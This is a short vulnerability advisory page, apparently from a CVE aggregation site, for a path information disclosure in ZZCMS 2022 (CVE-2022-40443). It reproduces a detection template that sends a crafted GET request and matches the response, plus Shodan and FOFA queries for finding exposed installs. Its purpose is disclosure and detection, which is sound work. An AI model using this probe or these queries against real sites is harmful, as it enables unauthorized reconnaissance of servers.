CVE-2022-40443: ZZCMS 2022 - Path Information Disclosure

日期: 2025-08-01 | 影响软件: ZZCMS 2022 | POC: 已公开

漏洞描述

An absolute path traversal vulnerability in ZZCMS 2022 allows attackers to obtain sensitive information via a crafted GET request.

PoC代码[已公开]

id: CVE-2022-40443

info:
  name: ZZCMS 2022 - Path Information Disclosure
  author: ritikchaddha
  severity: low
  description: |
    An absolute path traversal vulnerability in ZZCMS 2022 allows attackers to obtain sensitive information via a crafted GET request.
  impact: |
    An attacker can gain sensitive information about the server's file system.
  remediation: |
    Apply the vendor-supplied patch or upgrade to a non-vulnerable version.
  reference:
    - https://github.com/liong007/ZZCMS/issues/1
    - https://nvd.nist.gov/vuln/detail/CVE-2022-40443
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-40443
    cwe-id: CWE-22
    epss-score: 0.03595
    epss-percentile: 0.87274
    cpe: cpe:2.3:a:zzcms:zzcms:2022:*:*:*:*:*:*:*
  metadata:
    vendor: zzcms
    product: zzcms
    shodan-query: html:"zzcms"
    fofa-query: body="zzcms"
  tags: cve,cve22,zzcms,disclosure,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}//one/siteinfo.php"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'class="titlebig'
          - 'zzcms'
          - 'siteinfo[-_]\d+\.html?'
        condition: and

      - type: word
        part: body
        words:
          - '暂无信息'
        negative: true
# digest: 4a0a00473045022043c5cc61bc9d207dc6d767325dae031120eba255d7d5581337c91360e65b4fb0022100cd9b16ff7f72b2a85bfc3e5a1ec9c22e97d281e2db817b87e79623660e82b198:922c64590222798bb761d5b6d8e72950